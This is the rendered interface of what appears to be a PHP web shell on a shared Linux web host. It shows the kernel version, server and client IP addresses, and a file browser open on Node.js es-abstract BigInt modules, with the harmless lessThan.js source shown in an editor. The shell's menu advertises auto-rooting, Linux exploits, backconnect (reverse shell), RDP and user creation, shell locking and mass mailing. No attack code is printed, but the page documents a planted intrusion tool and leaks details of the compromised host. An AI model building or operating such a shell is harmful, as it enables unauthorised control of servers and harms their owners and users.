Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
es-abstract /
2021 /
BigInt /
[ HOME SHELL ]
Name
Size
Permission
Action
add.js
459
B
-rw-r--r--
bitwiseAND.js
503
B
-rw-r--r--
bitwiseNOT.js
450
B
-rw-r--r--
bitwiseOR.js
501
B
-rw-r--r--
bitwiseXOR.js
503
B
-rw-r--r--
divide.js
631
B
-rw-r--r--
equal.js
464
B
-rw-r--r--
exponentiate.js
887
B
-rw-r--r--
index.js
1.24
KB
-rw-r--r--
leftShift.js
472
B
-rw-r--r--
lessThan.js
469
B
-rw-r--r--
multiply.js
469
B
-rw-r--r--
remainder.js
706
B
-rw-r--r--
sameValue.js
478
B
-rw-r--r--
sameValueZero.js
486
B
-rw-r--r--
signedRightShift.js
505
B
-rw-r--r--
subtract.js
469
B
-rw-r--r--
toString.js
427
B
-rw-r--r--
unaryMinus.js
511
B
-rw-r--r--
unsignedRightShift.js
510
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lessThan.js
'use strict'; var GetIntrinsic = require('get-intrinsic'); var $TypeError = GetIntrinsic('%TypeError%'); var Type = require('../Type'); // https://262.ecma-international.org/11.0/#sec-numeric-types-bigint-lessThan module.exports = function BigIntLessThan(x, y) { if (Type(x) !== 'BigInt' || Type(y) !== 'BigInt') { throw new $TypeError('Assertion failed: `x` and `y` arguments must be BigInts'); } // shortcut for the actual spec mechanics return x < y; };
Close